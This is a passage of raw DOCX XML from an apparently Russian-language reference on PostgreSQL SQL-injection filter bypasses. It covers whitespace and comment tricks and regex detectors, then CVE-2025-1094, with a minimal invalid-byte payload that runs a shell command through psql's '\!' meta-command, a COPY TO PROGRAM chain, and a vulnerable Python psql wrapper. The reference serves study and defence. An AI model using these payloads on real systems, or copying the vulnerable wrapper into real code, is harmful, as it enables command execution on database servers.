        <w:t xml:space="preserve"> — вложенные комментарии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 отдельный приём, обходящий </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">парсер</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> комментариев в самописных pre-processor-ах (которые ищут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без учёта вложенности). 3.9.6 использует только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whitespace.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CRLF в комментариях. Граничит с Payload B (CR как разделитель); там фокус на парсер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(терминируется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здесь — CR как whitespace между токенами.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case-rule для unquoted identifiers важна: атакующий, инжектящий имя таблицы через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">format('%s', value)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, может использовать любой регистр, PG нормализует. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">format('%I', value)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> оборачивает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после этого регистр становится sensitive (другая семантика).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если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блокируется не как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а тоже whitespace-зависимо — Payload A/B могут протолкнуть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Часто комбо.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детектора </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">\bUNION\s*/\*.*?\*/\s*SELECT\b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (UNION с whitespace-trick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\bUNION[\t\r\n\f]+SELECT\b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (UNION с не-space whitespace)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3.9 в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">summary-3.9.md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Identifiers and Keywords (case rules, whitespace)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Comments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 — bypassing filters (whitespace, case)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OWASP: SQL Injection Bypassing WAF — alternative whitespace and case modulation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SQL Injection WAF Bypass — whitespace and case techniques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OWASP ModSecurity CRS: SQLi rules 942100–942521 (как примеры конкретных сигнатур)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.9.7 CVE-2025-1094 — encoding-bypass в libpq escape-функциях (pointer-карточка)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Полный разбор — в 4.5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (хронология disclosure, CVSS, цепочка с CVE-2024-12356 / BeyondTrust, patch-окно, managed-провайдеры). Здесь — только то, что нужно понимать в контексте 3.9: почему «правильная» санитизация через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">PQescapeLiteral</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> иногда </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">сама</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> становится точкой инъекции.</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Bug в libpq escape-функциях — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">`PQescapeLiteral`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">`PQescapeIdentifier`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">`PQescapeString`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">`PQescapeStringConn`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Эти функции — рекомендованный PG-способ построить SQL из недоверенного ввода, когда параметризация невозможна (например, имя таблицы/колонки). Они оборачивают значение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эскейпят внутренние кавычки.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Баг: если ввод содержит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">невалидный UTF-8 байт</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (например, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">0xC0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — начало 2-байтовой UTF-8 sequence без continuation byte), escape-функция пропускает этот байт без замены. Затем при дальнейшем сканировании она ошибочно интерпретирует следующий байт (закрывающую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часть multi-byte-последовательности и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не экранирует его</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Атакующий, контролирующий ввод, разрывает целевой литерал и инжектирует SQL.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Тот же эффект возникает при </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">mismatched encoding</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> между клиентом и сервером — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">client_encoding=BIG5</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server_encoding=EUC_TW</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MULE_INTERNAL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: байты, корректные в одной кодировке, в другой разбираются иначе, и escape ломается.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Минимальный payload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">hax\xC0'; \! id #</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Где: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hax</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — безобидный префикс.</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\xC0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — байт-затравка, ломающий escape.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закрывающая кавычка целевого литерала, которая прошла без замены.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id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">psql meta-command</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, не SQL. Когда escape-результат подаётся в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как stdin, psql интерпретирует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execute-shell-команду — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> исполняется как ОС-команда (от имени пользователя, под которым работает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комментарий до конца строки в psql.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Эквивалентный chain через серверный SQL (если psql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блокирован, но stacked queries проходят): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">'; COPY t TO PROGRAM 'id'; --</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — это уже 3.7.1.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Уязвимый паттерн</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># обёртка вокруг psql, типичная для backup/migration-утилит</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">import subprocess</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">from psycopg2.extensions import quote_ident, AsIs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table = request.args["table"]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">escaped = quote_ident(table, connection)  # вызывает PQescapeIdentifier</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">cmd = ["psql", "-d", "production", "-c", f"\\d {escaped}"]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">subprocess.run(cmd)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Если </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">table = "x\xC0\"; \\! id #"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — escape вернёт строку, в которой </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">\xC0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">-байт нарушил замыкание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\d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> исполнит meta-command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получив shell на сервере оператора.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Реальные продукты, где это эксплуатировалось, и chain-detail — в 4.5.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Почему это попадает в 3.9 (а не в 3.6 / 3.7)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Категория 3.9 — про </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">обход санитизации</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. CVE-2025-1094 — это баг в самой санитизации, officially recommended PG-методе. То есть атакующий не обходит фильтр </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">в обход</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> правильного API; он эксплуатирует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">сам</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
